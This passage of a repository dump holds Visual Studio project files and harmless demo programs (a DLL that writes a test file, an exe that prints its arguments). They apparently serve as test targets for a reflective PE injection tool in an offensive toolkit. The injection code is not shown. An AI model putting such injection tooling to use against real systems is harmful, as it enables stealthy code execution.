Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"targetver.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"stdafx.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"DemoDLL_RemoteProcess.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"dllmain.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt",
    "content": "========================================================================\n    DYNAMIC LINK LIBRARY : DemoDLL_RemoteProcess Project Overview\n========================================================================\n\nAppWizard has created this DemoDLL_RemoteProcess DLL for you.\n\nThis file contains a summary of what you will find in each of the files that\nmake up your DemoDLL_RemoteProcess application.\n\n\nDemoDLL_RemoteProcess.vcxproj\n    This is the main project file for VC++ projects generated using an Application Wizard.\n    It contains information about the version of Visual C++ that generated the file, and\n    information about the platforms, configurations, and project features selected with the\n    Application Wizard.\n\nDemoDLL_RemoteProcess.vcxproj.filters\n    This is the filters file for VC++ projects generated using an Application Wizard. \n    It contains information about the association between the files in your project \n    and the filters. This association is used in the IDE to show grouping of files with\n    similar extensions under a specific node (for e.g. \".cpp\" files are associated with the\n    \"Source Files\" filter).\n\nDemoDLL_RemoteProcess.cpp\n    This is the main DLL source file.\n\n\tWhen created, this DLL does not export any symbols. As a result, it\n\twill not produce a .lib file when it is built. If you wish this project\n\tto be a project dependency of some other project, you will either need to\n\tadd code to export some symbols from the DLL so that an export library\n\twill be produced, or you can set the Ignore Input Library property to Yes\n\ton the General propert page of the Linker folder in the project's Property\n\tPages dialog box.\n\n/////////////////////////////////////////////////////////////////////////////\nOther standard files:\n\nStdAfx.h, StdAfx.cpp\n    These files are used to build a precompiled header (PCH) file\n    named DemoDLL_RemoteProcess.pch and a precompiled types file named StdAfx.obj.\n\n/////////////////////////////////////////////////////////////////////////////\nOther notes:\n\nAppWizard uses \"TODO:\" comments to indicate parts of the source code you\nshould add to or customize.\n\n/////////////////////////////////////////////////////////////////////////////\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp",
    "content": "// dllmain.cpp : Defines the entry point for the DLL application.\n#include \"stdafx.h\"\n\nusing namespace std;\n\nBOOL APIENTRY DllMain( HMODULE hModule,\n                       DWORD  ul_reason_for_call,\n                       LPVOID lpReserved\n\t\t\t\t\t )\n{\n\tofstream myfile;\n\n\tswitch (ul_reason_for_call)\n\t{\n\tcase DLL_PROCESS_ATTACH:\n\t\t\t_mkdir(\"c:\\\\ReflectiveLoaderTest\");\n\t\t\tmyfile.open (\"c:\\\\ReflectiveLoaderTest\\\\DllMain.txt\");\n\t\t\tmyfile << \"DllMain successfully called.\\n\";\n\t\t\tmyfile.close();\n\t\tbreak;\n\tcase DLL_THREAD_ATTACH:\n\tcase DLL_THREAD_DETACH:\n\tcase DLL_PROCESS_DETACH:\n\t\tbreak;\n\t}\n\treturn TRUE;\n}\n\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp",
    "content": "// stdafx.cpp : source file that includes just the standard includes\n// DemoDLL_RemoteProcess.pch will be the pre-compiled header\n// stdafx.obj will contain the pre-compiled type information\n\n#include \"stdafx.h\"\n\n// TODO: reference any additional headers you need in STDAFX.H\n// and not in this file\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h",
    "content": "// stdafx.h : include file for standard system include files,\n// or project specific include files that are used frequently, but\n// are changed infrequently\n//\n\n#pragma once\n\n#include \"targetver.h\"\n\n#define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers\n// Windows Header Files:\n#include <windows.h>\n#include <iostream>\n#include <fstream>\n#include <string.h>\n#include <direct.h>\n\n\n// TODO: reference additional headers your program requires here\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h",
    "content": "#pragma once\n\n// Including SDKDDKVer.h defines the highest available Windows platform.\n\n// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and\n// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.\n\n#include <SDKDDKVer.h>\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln",
    "content": "﻿\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio 2012\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"DemoDLL_RemoteProcess\", \"DemoDLL_RemoteProcess\\DemoDLL_RemoteProcess.vcxproj\", \"{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|Win32 = Debug|Win32\n\t\tDebug|x64 = Debug|x64\n\t\tRelease|Win32 = Release|Win32\n\t\tRelease|x64 = Release|x64\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32\n\t\t{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32\n\t\t{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64\n\t\t{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32\n\t\t{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32\n\t\t{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64\n\t\t{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe.sln",
    "content": "﻿\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio 2012\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"DemoExe_MD\", \"DemoExe_MD\\DemoExe_MD.vcxproj\", \"{F674A5CE-F75F-4035-90AB-46DEBC670282}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"DemoExe_MDd\", \"DemoExe_MDd\\DemoExe_MDd.vcxproj\", \"{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|Win32 = Debug|Win32\n\t\tDebug|x64 = Debug|x64\n\t\tRelease|Win32 = Release|Win32\n\t\tRelease|x64 = Release|x64\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.ActiveCfg = Debug|Win32\n\t\t{F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.Build.0 = Debug|Win32\n\t\t{F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.Build.0 = Debug|x64\n\t\t{F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.ActiveCfg = Release|Win32\n\t\t{F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.Build.0 = Release|Win32\n\t\t{F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.ActiveCfg = Release|x64\n\t\t{F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.Build.0 = Release|x64\n\t\t{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.ActiveCfg = Debug|Win32\n\t\t{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.Build.0 = Debug|Win32\n\t\t{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.Build.0 = Debug|x64\n\t\t{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.ActiveCfg = Release|Win32\n\t\t{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.Build.0 = Release|Win32\n\t\t{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.ActiveCfg = Release|x64\n\t\t{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.Build.0 = Release|x64\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp",
    "content": "// DemoExe.cpp : Defines the entry point for the console application.\n//\n\n#include \"stdafx.h\"\n#include <iostream>\n\nusing namespace std;\n\nint _tmain(int argc, _TCHAR* argv[])\n{\n\tprintf(\"Exe loaded! Printing argc and argv\\n\\n\");\n\n\tprintf(\"Argc: %d\\n\", argc);\n\tprintf(\"ArgvAddress: %d\\n\", argv);\n\t\n\tfor (int i = 0; i < argc; i++)\n\t{\n\t\twprintf(L\"Argv: %s\\n\", argv[i]);\n\t}\n\n\tprintf(\"Exiting exe\\n\");\n\n\treturn 0;\n}\n\n\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{F674A5CE-F75F-4035-90AB-46DEBC670282}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>DemoExe_MD</RootNamespace>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\" />\n    <ClInclude Include=\"targetver.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"DemoExe_MD.cpp\" />\n    <ClCompile Include=\"stdafx.cpp\">\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">Create</PrecompiledHeader>\n    </ClCompile>\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"targetver.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"stdafx.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"DemoExe_MD.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt",
    "content": "========================================================================\n    CONSOLE APPLICATION : DemoExe_MD Project Overview\n========================================================================\n\nAppWizard has created this DemoExe_MD application for you.\n\nThis file contains a summary of what you will find in each of the files that\nmake up your DemoExe_MD application.\n\n\nDemoExe_MD.vcxproj\n    This is the main project file for VC++ projects generated using an Application Wizard.\n    It contains information about the version of Visual C++ that generated the file, and\n    information about the platforms, configurations, and project features selected with the\n    Application Wizard.\n\nDemoExe_MD.vcxproj.filters\n    This is the filters file for VC++ projects generated using an Application Wizard. \n    It contains information about the association between the files in your project \n    and the filters. This association is used in the IDE to show grouping of files with\n    similar extensions under a specific node (for e.g. \".cpp\" files are associated with the\n    \"Source Files\" filter).\n\nDemoExe_MD.cpp\n    This is the main application source file.\n\n/////////////////////////////////////////////////////////////////////////////\nOther standard files:\n\nStdAfx.h, StdAfx.cpp\n    These files are used to build a precompiled header (PCH) file\n    named DemoExe_MD.pch and a precompiled types file named StdAfx.obj.\n\n/////////////////////////////////////////////////////////////////////////////\nOther notes:\n\nAppWizard uses \"TODO:\" comments to indicate parts of the source code you\nshould add to or customize.\n\n/////////////////////////////////////////////////////////////////////////////\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp",
    "content": "// stdafx.cpp : source file that includes just the standard includes\n// DemoExe_MD.pch will be the pre-compiled header\n// stdafx.obj will contain the pre-compiled type information\n\n#include \"stdafx.h\"\n\n// TODO: reference any additional headers you need in STDAFX.H\n// and not in this file\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h",
    "content": "// stdafx.h : include file for standard system include files,\n// or project specific include files that are used frequently, but\n// are changed infrequently\n//\n\n#pragma once\n\n#include \"targetver.h\"\n\n#include <stdio.h>\n#include <tchar.h>\n\n\n\n// TODO: reference additional headers your program requires here\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h",
    "content": "#pragma once\n\n// Including SDKDDKVer.h defines the highest available Windows platform.\n\n// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and\n// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.\n\n#include <SDKDDKVer.h>\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp",
    "content": "// DemoExe.cpp : Defines the entry point for the console application.\n//\n\n#include \"stdafx.h\"\n#include <iostream>\n\nusing namespace std;\n\nint _tmain(int argc, _TCHAR* argv[])\n{\n\tprintf(\"Exe loaded! Printing argc and argv\\n\\n\");\n\n\tprintf(\"Argc: %d\\n\", argc);\n\tprintf(\"ArgvAddress: %d\\n\", argv);\n\t\n\tfor (int i = 0; i < argc; i++)\n\t{\n\t\twprintf(L\"Argv: %s\\n\", argv[i]);\n\t}\n\n\tprintf(\"Exiting exe\\n\");\n\n\treturn 0;\n}\n\n\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>DemoExe_MDd</RootNamespace>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup 